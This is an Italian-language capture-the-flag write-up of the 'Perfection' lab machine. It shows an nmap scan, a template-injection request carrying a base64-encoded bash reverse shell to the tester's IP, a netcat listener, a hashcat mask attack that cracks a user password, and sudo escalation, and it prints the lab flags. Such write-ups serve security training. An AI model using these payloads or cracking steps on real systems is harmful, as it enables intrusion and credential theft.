pingo il dispositivo per vedere se lo vedo -> OK

---scan nmap:

└─$ nmap -Pn -p- --min-rate 2000 -sC -sV -oN perfection.txt 10.10.11.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 17:53 CEST
Nmap scan report for 10.10.11.253
Host is up (0.039s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_  256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open  http    nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.78 seconds
                                                             
vedo il sito:
ho sezione about e vedo che ho due nomi: Tina Smith e Susan Miller, potrebbero essere utili per loggare con SSH (che è aperto sulla porta 22) 
nella sezione della media ponderata, se provo a mettere <script>alert("ciao");</script> mi dice -> Malicious input blocked
proviamo quindi a vedere con burp se l'header è vulnerabile all'XSS

quindi nell'header su burp ho: (dopo aver inserito i valori nei form)

POST /weighted-grade-calc HTTP/1.1
Host: 10.10.11.253
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 287
Origin: http://10.10.11.253
Connection: close
Referer: http://10.10.11.253/weighted-grade
Upgrade-Insecure-Requests: 1

category1=20&grade1=20&weight1=20&category2=20&grade2=20&weight2=20&category3=20&grade3=20&weight3=20&category4=20&grade4=20&weight4=20&category5=20&grade5=20&weight5=20

quindi devo cercare di far eseguire un comando al server per capire se li esegue o meno, quindi vado ad eseguire un ping sull'ip del mio pc, andando a modificare uno dei campi, con il comando system("ping -c1 $10.10.14.110");
codificandolo


e per verificare che il ping mi arrivi, avvio tcpdump -> sudo tcpdump -ni tun0 icmp 


quindi allora, vado a mettere una reverse shell, codificandola prima in base64 
└─$ base64 <<< "bash -i >& /dev/tcp/10.10.14.110/9001 0>&1" | sed 's/\+/\%2b/'
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4xMTAvOTAwMSAwPiYxCg==

poi inserendola qui nell'header:

POST /weighted-grade-calc HTTP/1.1
Host: 10.10.11.253
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 287
Origin: http://10.10.11.253
Connection: close
Referer: http://10.10.11.253/weighted-grade
Upgrade-Insecure-Requests: 1

grade1=20&weight1=20&category2=20&grade2=20&weight2=20&category3=20&grade3=20&weight3=20&category4=20&grade4=20&weight4=20&category5=20&grade5=20&weight5=20&category1=History%0A<%25%3dsystem("echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4xMTAvOTAwMSAwPiYxCg==+|+base64+-d+|+bash");%25>

e se su un terminale scrivo: nc -lvnp 9001, prendo la reverse shell e sono nel pc di susan:
facendo cd .. > cd .. > arrivo al file user.txt, faccio il cat del file e trovo la chiave dello user -> 3b02a28df7fbdda3240f330851bda0c9 

CONTROLLA LE MAIL SEMPRE!!!!

in var/spool/mail -> cat susan

Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students

in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

Note that all letters of the first name should be convered into lowercase.

Please hit me with updates on the migration when you can. I am currently registering our university with the platform.

- Tina, your delightful student


quindi sappiamo che la password sarà del tipo -> {firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

avvio hashcat per craccare la password -> hashcat -a 3 -m 1400 ~/Desktop/hashsusan.txt "susan_nasus_?d?d?d?d?d?d?d?d?d"
nel file hashsusan.txt c'è l'hash trovato in ~/susan/Migration/pupilpath_credentials.db faccio il cat del file ed infondo trovo -> abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f 


abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210 <-- proviamo questa
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Sun May 12 21:20:03 2024 (2 mins, 20 secs)
Time.Estimated...: Sun May 12 21:22:23 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2400.5 kH/s (0.50ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 324558848/1000000000 (32.46%)
Rejected.........: 0/324558848 (0.00%)
Restore.Point....: 324554752/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_058540610 -> susan_nasus_803824210
Hardware.Mon.#1..: Util: 31%

Started: Sun May 12 21:20:02 2024
Stopped: Sun May 12 21:22:25 2024

(per vederlo: hashcat -a 3 -m 1400 ~/Desktop/hashsusan.txt "susan_nasus_?d?d?d?d?d?d?d?d?d" --show)
----
ora che ho la password: susan_nasus_413759210

posso usarla per accedere con SSH facendo --> ssh susan@10.10.11.253 --> poi la password susan_nasus_413759210

--- SESSIONE SSH -> PRIVILEGE ESCALATION

faccio sudo -l (per vedere cosa posso fare)

e mi dà: 
Matching Defaults entries for susan on perfection:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User susan may run the following commands on perfection:
    (ALL : ALL) ALL
    
quindi posso direttamente fare: sudo cat /root/root.txt e trovo il flag root -> 246a3fe2c6315c09df81a8a210832d15

 






---enum4linux:

niente di che

---gobuster:

nulla, solo /about e 

facendo ../../../../../../etc/passwd mi dà la pagina -> http://10.10.11.253/etc/passwd 


